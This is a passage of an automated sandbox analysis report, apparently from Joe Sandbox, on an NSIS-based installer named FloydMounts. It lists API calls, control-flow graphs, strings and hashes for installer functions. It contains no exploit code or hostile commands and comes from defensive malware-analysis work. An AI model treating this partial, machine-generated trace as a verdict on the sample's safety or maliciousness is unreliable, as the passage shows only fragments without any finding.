                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                              • CloseClipboard.USER32 ref: 0040549A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                              • String ID: New install of "%s" to "%s"${
                                                                                              • API String ID: 2110491804-1641061399
                                                                                              • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                              • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                              Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                              • API String ID: 2435955865-3712954417
                                                                                              • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                              • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                              Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID: jF
                                                                                              • API String ID: 2295610775-3349280890
                                                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                              Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                              Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                              APIs
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                              Strings
                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                              • Call: %d, xrefs: 0040165A
                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                              • Jump: %d, xrefs: 00401602
                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                              • BringToFront, xrefs: 004016BD
                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                              • API String ID: 2872004960-3619442763
                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                              Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                                                              • DestroyWindow.USER32 ref: 00405512
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
